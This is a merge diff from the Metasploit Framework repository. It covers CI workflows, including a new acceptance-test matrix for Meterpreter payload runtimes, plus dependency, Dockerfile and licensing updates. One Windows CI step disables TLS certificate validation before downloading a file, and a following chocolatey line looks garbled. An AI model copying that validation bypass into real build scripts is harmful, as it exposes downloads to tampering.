Land #18383 , improves enum_computers module

This PR adds a variety of improvements to the enum_computers module including shell and powershell support as well as improvements to run on non-english systems.
automatic module_metadata_base.json update
2023-10-12 13:01:54 -04:00 · 2023-10-12 11:42:37 -05:00 · 2023-10-12 17:19:02 +01:00 · 2023-10-12 11:04:40 -05:00 · 2023-10-12 11:29:20 -04:00 · 2023-10-12 09:50:19 -04:00
1030 changed files with 122705 additions and 7765 deletions
@@ -0,0 +1,223 @@
+name: Acceptance
+
+# Optional, enabling concurrency limits: https://docs.github.com/en/actions/using-jobs/using-concurrency
+#concurrency:
+#  group: ${{ github.ref }}-${{ github.workflow }}
+#  cancel-in-progress: ${{ github.ref != 'refs/heads/main' }}
+
+# https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#permissions
+permissions:
+  actions: none
+  checks: none
+  contents: none
+  deployments: none
+  id-token: none
+  issues: none
+  discussions: none
+  packages: none
+  pages: none
+  pull-requests: none
+  repository-projects: none
+  security-events: none
+  statuses: none
+
+on:
+  push:
+    branches-ignore:
+      - gh-pages
+      - metakitty
+  pull_request:
+    branches:
+      - '*'
+    paths:
+      - 'metsploit-framework.gemspec'
+      - 'Gemfile.lock'
+      - 'data/templates/**'
+      - 'modules/payloads/**'
+      - 'lib/msf/core/payload/**'
+      - 'lib/msf/core/**'
+      - 'tools/dev/**'
+      - 'spec/acceptance/**'
+      - 'spec/acceptance_spec_helper.rb'
+#   Example of running as a cron, to weed out flaky tests
+#  schedule:
+#    - cron: '*/15 * * * *'
+
+jobs:
+  # Run all test individually, note there is a separate final job for aggregating the test results
+  test:
+    strategy:
+      fail-fast: false
+      matrix:
+        os:
+          - macos-11
+          - windows-2019
+          - ubuntu-20.04
+        ruby:
+          - 3.0.2
+        meterpreter:
+          # Python
+          - { name: python, runtime_version: 3.6 }
+          - { name: python, runtime_version: 3.11 }
+
+          # Java - newer versions of Java are not supported currently: https://github.com/rapid7/metasploit-payloads/issues/647
+          - { name: java, runtime_version: 8 }
+
+          # PHP
+          - { name: php, runtime_version: 5.3 }
+          - { name: php, runtime_version: 7.4 }
+          - { name: php, runtime_version: 8.2 }
+        include:
+          # Windows Meterpreter
+          - { meterpreter: { name: windows_meterpreter }, os: windows-2019 }
+          - { meterpreter: { name: windows_meterpreter }, os: windows-2022 }
+
+          # Mettle
+          - { meterpreter: { name: mettle }, os: macos-11 }
+          - { meterpreter: { name: mettle }, os: ubuntu-20.04 }
+
+    runs-on: ${{ matrix.os }}
+
+    timeout-minutes: 25
+
+    env:
+      RAILS_ENV: test
+      HOST_RUNNER_IMAGE: ${{ matrix.os }}
+      METERPRETER: ${{ matrix.meterpreter.name }}
+      METERPRETER_RUNTIME_VERSION: ${{ matrix.meterpreter.runtime_version }}
+
+    name: ${{ matrix.meterpreter.name }} ${{ matrix.meterpreter.runtime_version }} ${{ matrix.os }}
+    steps:
+      - name: Install system dependencies (Linux)
+        if: runner.os == 'Linux'
+        run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz
+
+      - uses: shivammathur/setup-php@5b29e8a45433c406b3902dff138a820a408c45b7
+        if: ${{ matrix.meterpreter.name == 'php' }}
+        with:
+          php-version: ${{ matrix.meterpreter.runtime_version }}
+          tools: none
+
+      - name: Set up Python
+        if: ${{ matrix.meterpreter.name == 'python' }}
+        uses: actions/setup-python@v4
+        with:
+          python-version: ${{ matrix.meterpreter.runtime_version }}
+
+      - uses: actions/setup-java@v3
+        if: ${{ matrix.meterpreter.name == 'java' }}
+        with:
+          distribution: temurin
+          java-version: ${{ matrix.meterpreter.runtime_version }}
+
+      - name: Install system dependencies (Windows)
+        shell: cmd
+        if: runner.os == 'Windows'
+        run: |
+          REM pcap dependencies
+          powershell -Command "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object System.Net.WebClient).DownloadFile('https://www.winpcap.org/install/bin/WpdPack_4_1_2.zip', 'C:\Windows\Temp\WpdPack_4_1_2.zip')"
+
+          choco install 7zip.installServerCertificateValidationCallback
+          7z x "C:\Windows\Temp\WpdPack_4_1_2.zip" -o"C:\"
+
+          dir C:\\
+
+          dir %WINDIR%
+          type %WINDIR%\\system32\\drivers\\etc\\hosts
+
+      - name: Checkout code
+        uses: actions/checkout@v3
+
+      - name: Setup Ruby
+        env:
+          BUNDLE_WITHOUT: "coverage development"
+          BUNDLE_FORCE_RUBY_PLATFORM: true
+        uses: ruby/setup-ruby@v1
+        with:
+          ruby-version: ${{ matrix.ruby }}
+          bundler-cache: true
+          cache-version: 4
+          # Github actions with Ruby requires Bundler 2.2.18+
+          # https://github.com/ruby/setup-ruby/tree/d2b39ad0b52eca07d23f3aa14fdf2a3fcc1f411c#windows
+          bundler: 2.2.33
+
+      - name: acceptance
+        env:
+          SPEC_HELPER_LOAD_METASPLOIT: false
+          SPEC_OPTS: "--tag acceptance --require acceptance_spec_helper.rb --color --format documentation --format AllureRspec::RSpecFormatter"
+        # Unix run command:
+        #   SPEC_HELPER_LOAD_METASPLOIT=false bundle exec ./spec/acceptance
+        # Windows cmd command:
+        #   set SPEC_HELPER_LOAD_METASPLOIT=false
+        #   bundle exec rspec .\spec\acceptance
+        # Note: rspec retry is intentionally not used, as it can cause issues with allure's reporting
+        # Additionally - flakey tests should be fixed or marked as flakey instead of silently retried
+        run: |
+          bundle exec rspec spec/acceptance/
+
+      - name: Archive results
+        if: always()
+        uses: actions/upload-artifact@v3
+        with:
+          # Provide a unique artifact for each matrix os, otherwise race conditions can lead to corrupt zips
+          name: raw-data-${{ matrix.meterpreter.name }}-${{ matrix.meterpreter.runtime_version }}-${{ matrix.os }}
+          path: tmp/allure-raw-data
+
+  # Generate a final report from the previous test results
+  report:
+    name: Generate report
+    needs: test
+    runs-on: ubuntu-latest
+    if: always()
+
+    steps:
+      - name: Checkout code
+        uses: actions/checkout@v3
+        if: always()
+
+      - name: Install system dependencies (Linux)
+        if: always()
+        run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz
+
+      - name: Setup Ruby
+        if: always()
+        env:
+          BUNDLE_WITHOUT: "coverage development"
+          BUNDLE_FORCE_RUBY_PLATFORM: true
+        uses: ruby/setup-ruby@v1
+        with:
+          ruby-version: 3.0.2
+          bundler-cache: true
+          cache-version: 4
+          # Github actions with Ruby requires Bundler 2.2.18+
+          # https://github.com/ruby/setup-ruby/tree/d2b39ad0b52eca07d23f3aa14fdf2a3fcc1f411c#windows
+          bundler: 2.2.33
+
+      - uses: actions/download-artifact@v3
+        id: download
+        if: always()
+        with:
+          # Note: Not specifying a name will download all artifacts from the previous workflow jobs
+          path: raw-data
+
+      - name: allure generate
+        if: always()
+        run: |
+          export VERSION=2.22.1
+
+          curl -o allure-$VERSION.tgz -Ls https://github.com/allure-framework/allure2/releases/download/$VERSION/allure-$VERSION.tgz
+          tar -zxvf allure-$VERSION.tgz -C .
+
+          ls -la ${{steps.download.outputs.download-path}}
+          ./allure-$VERSION/bin/allure generate ${{steps.download.outputs.download-path}}/* -o ./allure-report
+
+          find ${{steps.download.outputs.download-path}}
+          bundle exec ruby tools/dev/report_generation/support_matrix/generate.rb --allure-data ${{steps.download.outputs.download-path}} > ./allure-report/support_matrix.html
+
+      - name: archive results
+        if: always()
+        uses: actions/upload-artifact@v3
+        with:
+          name: final-report-${{ github.run_id }}
+          path: |
+            ./allure-report
@@ -38,7 +38,7 @@ jobs:
      fail-fast: true
      matrix:
        ruby:
-          - '2.7'
+          - '3.0'

    name: Ruby ${{ matrix.ruby }}
    steps:
@@ -35,7 +35,7 @@ jobs:
      fail-fast: true
      matrix:
        ruby:
-          - '2.7'
+          - '3.0'

    name: Lint msftidy
    steps:
@@ -64,15 +64,14 @@ jobs:
      fail-fast: true
      matrix:
        ruby:
-          - '2.7'
          - '3.0'
          - '3.1'
          - '3.2'
+          - '3.3.0-preview1'
        os:
          - ubuntu-20.04
          - ubuntu-latest
        exclude:
-          - { os: ubuntu-latest, ruby: '2.7' }
          - { os: ubuntu-latest, ruby: '3.0' }
        include:
          - os: ubuntu-latest
@@ -91,7 +90,7 @@ jobs:
    name: ${{ matrix.os }} - Ruby ${{ matrix.ruby }} - ${{ matrix.test_cmd }}
    steps:
      - name: Install system dependencies
-        run: sudo apt-get install libpcap-dev graphviz
+        run: sudo apt-get install -y --no-install-recommends libpcap-dev graphviz

      - name: Checkout code
        uses: actions/checkout@v3
@@ -99,6 +98,8 @@ jobs:
      - name: Setup Ruby
        env:
          BUNDLE_WITHOUT: "coverage development pcap"
+          # Nokogiri doesn't release pre-compiled binaries for preview versions of Ruby; So force compilation with BUNDLE_FORCE_RUBY_PLATFORM
+          BUNDLE_FORCE_RUBY_PLATFORM: "${{ contains(matrix.ruby, 'preview') && 'true' || 'false' }}"
        uses: ruby/setup-ruby@v1
        with:
          ruby-version: '${{ matrix.ruby }}'
@@ -40,7 +40,7 @@ jobs:
            const hasPR = await github.rest.pulls.list({
              owner,
              repo,
-              head: owner + ':' + '${{ github.ref_name }}' 
+              head: owner + ':' + '${{ github.ref_name }}'
            });
            console.log('hasPR:');
            console.log(JSON.stringify({ data: hasPR.data, status: hasPR.status }, null, 4));
@@ -19,6 +19,8 @@ Gemfile.local.lock
 .yardoc
 # Mac OS X files
 .DS_Store
+# Ignore Solargraph config file
+.solargraph.yml
 # database config for testing
 config/database.yml
 # target config file for testing
@@ -22,6 +22,7 @@ require:
  - ./lib/rubocop/cop/lint/module_disclosure_date_present.rb
  - ./lib/rubocop/cop/lint/deprecated_gem_version.rb
  - ./lib/rubocop/cop/lint/module_enforce_notes.rb
+  - ./lib/rubocop/cop/lint/detect_invalid_pack_directives.rb

 Layout/SpaceBeforeBrackets:
  Description: >-
@@ -166,6 +167,9 @@ Layout/ModuleHashValuesOnSameLine:
 Layout/ModuleDescriptionIndentation:
  Enabled: true

+Lint/DetectInvalidPackDirectives:
+  Enabled: true
+
 Lint/ModuleDisclosureDateFormat:
  Enabled: true

@@ -0,0 +1,28 @@
+---
+include:
+- "**/*.rb"
+exclude:
+- spec/**/*
+- test/**/*
+- vendor/**/*
+- ".bundle/**/*"
+- modules/**/*
+- data/**/*
+- db/**/*
+- external/**/*
+- plugins/**/*
+- scripts/**/* # Some of this is old and may not need indexing???
+require: []
+domains: []
+reporters:
+- rubocop
+- require_not_found
+formatter:
+  rubocop:
+    cops: safe
+    except: []
+    only: []
+    extra_args: []
+require_paths: []
+plugins: []
+max_files: 0
@@ -43,9 +43,9 @@ RUN apk add --no-cache \
 ENV GO111MODULE=off
 RUN mkdir -p $TOOLS_HOME/bin && \
    cd $TOOLS_HOME/bin && \
-    curl -O https://dl.google.com/go/go1.19.3.src.tar.gz && \
-    tar -zxf go1.19.3.src.tar.gz && \
-    rm go1.19.3.src.tar.gz && \
+    curl -O https://dl.google.com/go/go1.21.1.src.tar.gz && \
+    tar -zxf go1.21.1.src.tar.gz && \
+    rm go1.21.1.src.tar.gz && \
    cd go/src && \
    ./make.bash

@@ -61,8 +61,8 @@ ENV METASPLOIT_GROUP=metasploit
 RUN addgroup -S $METASPLOIT_GROUP

 RUN apk add --no-cache bash sqlite-libs nmap nmap-scripts nmap-nselibs \
-    postgresql-libs python2 python3 py3-pip ncurses libcap su-exec alpine-sdk \
-    python2-dev openssl-dev nasm mingw-w64-gcc
+    postgresql-libs python3 py3-pip ncurses libcap su-exec alpine-sdk \
+    openssl-dev nasm mingw-w64-gcc

 RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which ruby)
 RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which nmap)
@@ -75,7 +75,7 @@ RUN chown -R root:metasploit $APP_HOME/
 RUN chmod 664 $APP_HOME/Gemfile.lock
 RUN gem update --system
 RUN cp -f $APP_HOME/docker/database.yml $APP_HOME/config/database.yml
-RUN curl -L -O https://github.com/pypa/get-pip/raw/3843bff3a0a61da5b63ea0b7d34794c5c51a2f11/get-pip.py && python get-pip.py && rm get-pip.py
+RUN curl -L -O https://raw.githubusercontent.com/pypa/get-pip/f84b65709d4b20221b7dbee900dbf9985a81b5d4/public/get-pip.py && python3 get-pip.py && rm get-pip.py
 RUN pip install impacket
 RUN pip install requests

@@ -31,20 +31,24 @@ group :development do
 end

 group :development, :test do
-  # automatically include factories from spec/factories
-  gem 'factory_bot_rails'
-  # Make rspec output shorter and more useful
-  gem 'fivemat'
  # running documentation generation tasks and rspec tasks
  gem 'rake'
  # Define `rake spec`.  Must be in development AND test so that its available by default as a rake test when the
  # environment is development
  gem 'rspec-rails'
  gem 'rspec-rerun'
+  # Required during CI as well local development
  gem 'rubocop'
 end

 group :test do
+  # automatically include factories from spec/factories
+  gem 'test-prof'
+  gem 'factory_bot_rails'
+  # Make rspec output shorter and more useful
+  gem 'fivemat'
+  # rspec formatter for acceptance tests
+  gem 'allure-rspec'
  # Manipulate Time.now in specs
  gem 'timecop'
 end
@@ -1,13 +1,15 @@
 PATH
  remote: .
  specs:
-    metasploit-framework (6.3.16)
-      actionpack (~> 7.0)
-      activerecord (~> 7.0)
-      activesupport (~> 7.0)
+    metasploit-framework (6.3.38)
+      actionpack (~> 7.0.0)
+      activerecord (~> 7.0.0)
+      activesupport (~> 7.0.0)
      aws-sdk-ec2
+      aws-sdk-ec2instanceconnect
      aws-sdk-iam
      aws-sdk-s3
+      aws-sdk-ssm
      bcrypt
      bcrypt_pbkdf
      bootsnap
@@ -24,25 +26,26 @@ PATH
      filesize
      hrr_rb_ssh-ed25519
      http-cookie
-      irb
+      irb (~> 1.7.4)
      jsobfu
      json
      metasm
      metasploit-concern
      metasploit-credential
      metasploit-model
-      metasploit-payloads (= 2.0.130)
+      metasploit-payloads (= 2.0.156)
      metasploit_data_models
-      metasploit_payloads-mettle (= 1.0.20)
+      metasploit_payloads-mettle (= 1.0.26)
      mqtt
      msgpack (~> 1.6.0)
      nessus_rest
+      net-imap
      net-ldap
      net-smtp
      net-ssh
      network_interface
      nexpose
-      nokogiri
+      nokogiri (~> 1.14.0)
      octokit (~> 4.0)
      openssl-ccm
      openvas-omp
@@ -76,6 +79,7 @@ PATH
      rex-text
      rex-zip
      ruby-macho
+      ruby-mysql
      ruby_smb (~> 3.2.0)
      rubyntlm
      rubyzip
@@ -99,58 +103,73 @@ GEM
  remote: https://rubygems.org/
  specs:
    Ascii85 (1.1.0)
-    actionpack (7.0.4.3)
-      actionview (= 7.0.4.3)
-      activesupport (= 7.0.4.3)
-      rack (~> 2.0, >= 2.2.0)
+    actionpack (7.0.8)
+      actionview (= 7.0.8)
+      activesupport (= 7.0.8)
+      rack (~> 2.0, >= 2.2.4)
      rack-test (>= 0.6.3)
      rails-dom-testing (~> 2.0)
      rails-html-sanitizer (~> 1.0, >= 1.2.0)
-    actionview (7.0.4.3)
-      activesupport (= 7.0.4.3)
+    actionview (7.0.8)
+      activesupport (= 7.0.8)
      builder (~> 3.1)
      erubi (~> 1.4)
      rails-dom-testing (~> 2.0)
      rails-html-sanitizer (~> 1.1, >= 1.2.0)
-    activemodel (7.0.4.3)
-      activesupport (= 7.0.4.3)
-    activerecord (7.0.4.3)
-      activemodel (= 7.0.4.3)
-      activesupport (= 7.0.4.3)
-    activesupport (7.0.4.3)
+    activemodel (7.0.8)
+      activesupport (= 7.0.8)
+    activerecord (7.0.8)
+      activemodel (= 7.0.8)
+      activesupport (= 7.0.8)
+    activesupport (7.0.8)
      concurrent-ruby (~> 1.0, >= 1.0.2)
      i18n (>= 1.6, < 2)
      minitest (>= 5.1)
      tzinfo (~> 2.0)
-    addressable (2.8.4)
+    addressable (2.8.5)
      public_suffix (>= 2.0.2, < 6.0)
    afm (0.2.2)
+    allure-rspec (2.23.0)
+      allure-ruby-commons (= 2.23.0)
+      rspec-core (>= 3.8, < 4)
+    allure-ruby-commons (2.23.0)
+      mime-types (>= 3.3, < 4)
+      require_all (>= 2, < 4)
+      rspec-expectations (~> 3.12)
+      uuid (>= 2.3, < 3)
    arel-helpers (2.14.0)
      activerecord (>= 3.1.0, < 8)
    ast (2.4.2)
    aws-eventstream (1.2.0)
-    aws-partitions (1.749.0)
-    aws-sdk-core (3.171.0)
+    aws-partitions (1.834.0)
+    aws-sdk-core (3.185.1)
      aws-eventstream (~> 1, >= 1.0.2)
      aws-partitions (~> 1, >= 1.651.0)
      aws-sigv4 (~> 1.5)
      jmespath (~> 1, >= 1.6.1)
-    aws-sdk-ec2 (1.375.0)
-      aws-sdk-core (~> 3, >= 3.165.0)
+    aws-sdk-ec2 (1.411.0)
+      aws-sdk-core (~> 3, >= 3.184.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-iam (1.77.0)
-      aws-sdk-core (~> 3, >= 3.165.0)
+    aws-sdk-ec2instanceconnect (1.34.0)
+      aws-sdk-core (~> 3, >= 3.184.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-kms (1.63.0)
-      aws-sdk-core (~> 3, >= 3.165.0)
+    aws-sdk-iam (1.87.0)
+      aws-sdk-core (~> 3, >= 3.184.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-s3 (1.120.1)
-      aws-sdk-core (~> 3, >= 3.165.0)
+    aws-sdk-kms (1.72.0)
+      aws-sdk-core (~> 3, >= 3.184.0)
+      aws-sigv4 (~> 1.1)
+    aws-sdk-s3 (1.136.0)
+      aws-sdk-core (~> 3, >= 3.181.0)
      aws-sdk-kms (~> 1)
-      aws-sigv4 (~> 1.4)
-    aws-sigv4 (1.5.2)
+      aws-sigv4 (~> 1.6)
+    aws-sdk-ssm (1.158.0)
+      aws-sdk-core (~> 3, >= 3.184.0)
+      aws-sigv4 (~> 1.1)
+    aws-sigv4 (1.6.0)
      aws-eventstream (~> 1, >= 1.0.2)
-    bcrypt (3.1.18)
+    base64 (0.1.1)
+    bcrypt (3.1.19)
    bcrypt_pbkdf (1.1.0)
    bindata (2.4.15)
    bootsnap (1.16.0)
@@ -164,7 +183,8 @@ GEM
    cookiejar (0.3.3)
    crass (1.0.6)
    daemons (1.4.1)
-    debug (1.7.2)
+    date (3.3.3)
+    debug (1.8.0)
      irb (>= 1.5.0)
      reline (>= 0.3.1)
    diff-lcs (1.5.0)
@@ -189,18 +209,19 @@ GEM
    factory_bot_rails (6.2.0)
      factory_bot (~> 6.2.0)
      railties (>= 5.0.0)
-    faker (3.2.0)
+    faker (3.2.1)
      i18n (>= 1.8.11, < 2)
-    faraday (2.7.4)
+    faraday (2.7.11)
+      base64
      faraday-net_http (>= 2.0, < 3.1)
      ruby2_keywords (>= 0.0.4)
    faraday-net_http (3.0.2)
-    faraday-retry (2.1.0)
+    faraday-retry (2.2.0)
      faraday (~> 2.0)
-    faye-websocket (0.11.2)
+    faye-websocket (0.11.3)
      eventmachine (>= 0.12.0)
      websocket-driver (>= 0.5.1)
-    ffi (1.15.5)
+    ffi (1.16.3)
    filesize (0.2.0)
    fivemat (1.3.7)
    gssapi (1.3.1)
@@ -217,30 +238,33 @@ GEM
      domain_name (~> 0.5)
    http_parser.rb (0.8.0)
    httpclient (2.8.3)
-    i18n (1.12.0)
+    i18n (1.14.1)
      concurrent-ruby (~> 1.0)
    io-console (0.6.0)
-    irb (1.6.4)
-      reline (>= 0.3.0)
+    irb (1.7.4)
+      reline (>= 0.3.6)
    jmespath (1.6.2)
    jsobfu (0.4.2)
      rkelly-remix
    json (2.6.3)
+    language_server-protocol (3.17.0.3)
    little-plugger (1.1.4)
    logging (2.3.1)
      little-plugger (~> 1.1)
      multi_json (~> 1.14)
-    loofah (2.20.0)
+    loofah (2.21.3)
      crass (~> 1.0.2)
-      nokogiri (>= 1.5.9)
+      nokogiri (>= 1.12.0)
+    macaddr (1.7.2)
+      systemu (~> 2.6.5)
    memory_profiler (1.0.1)
    metasm (1.0.5)
-    metasploit-concern (5.0.1)
+    metasploit-concern (5.0.2)
      activemodel (~> 7.0)
      activesupport (~> 7.0)
      railties (~> 7.0)
      zeitwerk
-    metasploit-credential (6.0.4)
+    metasploit-credential (6.0.6)
      metasploit-concern
      metasploit-model
      metasploit_data_models (>= 5.0.0)
@@ -250,12 +274,12 @@ GEM
      rex-socket
      rubyntlm
      rubyzip
-    metasploit-model (5.0.1)
+    metasploit-model (5.0.2)
      activemodel (~> 7.0)
      activesupport (~> 7.0)
      railties (~> 7.0)
-    metasploit-payloads (2.0.130)
-    metasploit_data_models (6.0.2)
+    metasploit-payloads (2.0.156)
+    metasploit_data_models (6.0.3)
      activerecord (~> 7.0)
      activesupport (~> 7.0)
      arel-helpers
@@ -265,26 +289,32 @@ GEM
      railties (~> 7.0)
      recog
      webrick
-    metasploit_payloads-mettle (1.0.20)
+    metasploit_payloads-mettle (1.0.26)
    method_source (1.0.0)
-    mini_portile2 (2.8.1)
-    minitest (5.18.0)
+    mime-types (3.5.1)
+      mime-types-data (~> 3.2015)
+    mime-types-data (3.2023.1003)
+    mini_portile2 (2.8.4)
+    minitest (5.20.0)
    mqtt (0.6.0)
    msgpack (1.6.1)
    multi_json (1.15.0)
    mustermann (3.0.0)
      ruby2_keywords (~> 0.0.1)
    nessus_rest (0.1.6)
+    net-imap (0.4.0)
+      date
+      net-protocol
    net-ldap (0.18.0)
    net-protocol (0.2.1)
      timeout
-    net-smtp (0.3.3)
+    net-smtp (0.4.0)
      net-protocol
-    net-ssh (7.1.0)
-    network_interface (0.0.2)
+    net-ssh (7.2.0)
+    network_interface (0.0.4)
    nexpose (7.3.0)
    nio4r (2.5.9)
-    nokogiri (1.14.3)
+    nokogiri (1.14.5)
      mini_portile2 (~> 2.8.0)
      racc (~> 1.4)
    nori (2.6.0)
@@ -294,11 +324,12 @@ GEM
    openssl-ccm (1.2.3)
    openssl-cmac (2.0.2)
    openvas-omp (0.0.4)
-    packetfu (1.1.13)
-      pcaprub
+    packetfu (2.0.0)
+      pcaprub (~> 0.13.1)
    parallel (1.23.0)
-    parser (3.2.2.1)
+    parser (3.2.2.4)
      ast (~> 2.4.1)
+      racc
    patch_finder (1.0.2)
    pcaprub (0.13.1)
    pdf-reader (2.11.0)
@@ -307,30 +338,32 @@ GEM
      hashery (~> 2.0)
      ruby-rc4
      ttfunk
-    pg (1.4.6)
+    pg (1.5.4)
    pry (0.14.2)
      coderay (~> 1.1)
      method_source (~> 1.0)
    pry-byebug (3.10.1)
      byebug (~> 11.0)
      pry (>= 0.13, < 0.15)
-    public_suffix (5.0.1)
-    puma (6.2.2)
+    public_suffix (5.0.3)
+    puma (6.4.0)
      nio4r (~> 2.0)
-    racc (1.6.2)
-    rack (2.2.6.4)
-    rack-protection (3.0.6)
-      rack
+    racc (1.7.1)
+    rack (2.2.8)
+    rack-protection (3.1.0)
+      rack (~> 2.2, >= 2.2.4)
    rack-test (2.1.0)
      rack (>= 1.3)
-    rails-dom-testing (2.0.3)
-      activesupport (>= 4.2.0)
+    rails-dom-testing (2.2.0)
+      activesupport (>= 5.0.0)
+      minitest
      nokogiri (>= 1.6)
-    rails-html-sanitizer (1.5.0)
-      loofah (~> 2.19, >= 2.19.1)
-    railties (7.0.4.3)
-      actionpack (= 7.0.4.3)
-      activesupport (= 7.0.4.3)
+    rails-html-sanitizer (1.6.0)
+      loofah (~> 2.21)
+      nokogiri (~> 1.14)
+    railties (7.0.8)
+      actionpack (= 7.0.8)
+      activesupport (= 7.0.8)
      method_source
      rake (>= 12.2)
      thor (~> 1.0)
@@ -340,98 +373,102 @@ GEM
    rasn1 (0.12.1)
      strptime (~> 0.2.5)
    rb-readline (0.5.5)
-    recog (3.1.1)
+    recog (3.1.2)
      nokogiri
    redcarpet (3.6.0)
-    regexp_parser (2.8.0)
-    reline (0.3.3)
+    regexp_parser (2.8.1)
+    reline (0.3.8)
      io-console (~> 0.5)
-    rex-arch (0.1.14)
+    require_all (3.0.0)
+    rex-arch (0.1.15)
      rex-text
-    rex-bin_tools (0.1.8)
+    rex-bin_tools (0.1.9)
      metasm
      rex-arch
      rex-core
      rex-struct2
      rex-text
-    rex-core (0.1.30)
-    rex-encoder (0.1.6)
+    rex-core (0.1.31)
+    rex-encoder (0.1.7)
      metasm
      rex-arch
      rex-text
-    rex-exploitation (0.1.38)
+    rex-exploitation (0.1.39)
      jsobfu
      metasm
      rex-arch
      rex-encoder
      rex-text
      rexml
-    rex-java (0.1.6)
-    rex-mime (0.1.7)
+    rex-java (0.1.7)
+    rex-mime (0.1.8)
      rex-text
-    rex-nop (0.1.2)
+    rex-nop (0.1.3)
      rex-arch
-    rex-ole (0.1.7)
+    rex-ole (0.1.8)
      rex-text
-    rex-powershell (0.1.97)
+    rex-powershell (0.1.99)
      rex-random_identifier
      rex-text
      ruby-rc4
-    rex-random_identifier (0.1.10)
+    rex-random_identifier (0.1.11)
      rex-text
-    rex-registry (0.1.4)
-    rex-rop_builder (0.1.4)
+    rex-registry (0.1.5)
+    rex-rop_builder (0.1.5)
      metasm
      rex-core
      rex-text
-    rex-socket (0.1.49)
+    rex-socket (0.1.54)
      rex-core
-    rex-sslscan (0.1.9)
+    rex-sslscan (0.1.10)
      rex-core
      rex-socket
      rex-text
-    rex-struct2 (0.1.3)
-    rex-text (0.2.50)
-    rex-zip (0.1.4)
+    rex-struct2 (0.1.4)
+    rex-text (0.2.53)
+    rex-zip (0.1.5)
      rex-text
-    rexml (3.2.5)
+    rexml (3.2.6)
    rkelly-remix (0.0.7)
    rspec (3.12.0)
      rspec-core (~> 3.12.0)
      rspec-expectations (~> 3.12.0)
      rspec-mocks (~> 3.12.0)
-    rspec-core (3.12.1)
+    rspec-core (3.12.2)
      rspec-support (~> 3.12.0)
-    rspec-expectations (3.12.2)
+    rspec-expectations (3.12.3)
      diff-lcs (>= 1.2.0, < 2.0)
      rspec-support (~> 3.12.0)
-    rspec-mocks (3.12.5)
+    rspec-mocks (3.12.6)
      diff-lcs (>= 1.2.0, < 2.0)
      rspec-support (~> 3.12.0)
-    rspec-rails (6.0.1)
+    rspec-rails (6.0.3)
      actionpack (>= 6.1)
      activesupport (>= 6.1)
      railties (>= 6.1)
-      rspec-core (~> 3.11)
-      rspec-expectations (~> 3.11)
-      rspec-mocks (~> 3.11)
-      rspec-support (~> 3.11)
+      rspec-core (~> 3.12)
+      rspec-expectations (~> 3.12)
+      rspec-mocks (~> 3.12)
+      rspec-support (~> 3.12)
    rspec-rerun (1.1.0)
      rspec (~> 3.0)
-    rspec-support (3.12.0)
-    rubocop (1.50.2)
+    rspec-support (3.12.1)
+    rubocop (1.56.4)
+      base64 (~> 0.1.1)
      json (~> 2.3)
+      language_server-protocol (>= 3.17.0)
      parallel (~> 1.10)
-      parser (>= 3.2.0.0)
+      parser (>= 3.2.2.3)
      rainbow (>= 2.2.2, < 4.0)
      regexp_parser (>= 1.8, < 3.0)
      rexml (>= 3.2.5, < 4.0)
-      rubocop-ast (>= 1.28.0, < 2.0)
+      rubocop-ast (>= 1.28.1, < 2.0)
      ruby-progressbar (~> 1.7)
      unicode-display_width (>= 2.4.0, < 3.0)
-    rubocop-ast (1.28.0)
+    rubocop-ast (1.29.0)
      parser (>= 3.2.1.0)
-    ruby-macho (3.0.0)
+    ruby-macho (4.0.0)
+    ruby-mysql (4.1.0)
    ruby-prof (1.4.2)
    ruby-progressbar (1.13.0)
    ruby-rc4 (0.1.5)
@@ -453,24 +490,26 @@ GEM
    simplecov-html (0.12.3)
    simpleidn (0.2.1)
      unf (~> 0.1.4)
-    sinatra (3.0.6)
+    sinatra (3.1.0)
      mustermann (~> 3.0)
      rack (~> 2.2, >= 2.2.4)
-      rack-protection (= 3.0.6)
+      rack-protection (= 3.1.0)
      tilt (~> 2.0)
-    sqlite3 (1.6.2)
+    sqlite3 (1.6.6)
      mini_portile2 (~> 2.8.0)
-    sshkey (2.0.0)
+    sshkey (3.0.0)
    strptime (0.2.5)
    swagger-blocks (3.0.0)
+    systemu (2.6.5)
+    test-prof (1.2.3)
    thin (1.8.2)
      daemons (~> 1.0, >= 1.0.9)
      eventmachine (~> 1.0, >= 1.0.4)
      rack (>= 1, < 3)
-    thor (1.2.1)
-    tilt (2.1.0)
-    timecop (0.9.6)
-    timeout (0.3.2)
+    thor (1.2.2)
+    tilt (2.3.0)
+    timecop (0.9.8)
+    timeout (0.4.0)
    ttfunk (1.7.0)
    tzinfo (2.0.6)
      concurrent-ruby (~> 1.0)
@@ -479,12 +518,14 @@ GEM
    unf (0.1.4)
      unf_ext
    unf_ext (0.0.8.2)
-    unicode-display_width (2.4.2)
+    unicode-display_width (2.5.0)
    unix-crypt (1.3.1)
+    uuid (2.3.9)
+      macaddr (~> 1.0)
    warden (1.2.9)
      rack (>= 2.0.9)
    webrick (1.8.1)
-    websocket-driver (0.7.5)
+    websocket-driver (0.7.6)
      websocket-extensions (>= 0.1.0)
    websocket-extensions (0.1.5)
    win32api (0.1.0)
@@ -501,15 +542,16 @@ GEM
    xdr (3.0.3)
      activemodel (>= 4.2, < 8.0)
      activesupport (>= 4.2, < 8.0)
-    xmlrpc (0.3.2)
+    xmlrpc (0.3.3)
      webrick
    yard (0.9.34)
-    zeitwerk (2.6.7)
+    zeitwerk (2.6.12)

 PLATFORMS
  ruby

 DEPENDENCIES
+  allure-rspec
  debug (>= 1.0.0)
  factory_bot_rails
  fivemat
@@ -524,6 +566,7 @@ DEPENDENCIES
  rubocop
  ruby-prof (= 1.4.2)
  simplecov (= 0.18.2)
+  test-prof
  timecop
  yard

@@ -21,6 +21,11 @@ Copyright: 2007  Roland Bouman
 License: LGPL-2.1
 Purpose: These files are used in exploits/multi/mysql/mysql_udf_payload.rb

+Files: data/exploits/cve-2023-34634/test.png
+Copyright: 2023 Brendan Watters
+License: MIT
+Purpose: These image is used as the default file to embed the exploit command.
+
 Files: data/headers/windows/c_payload_util/beacon.h
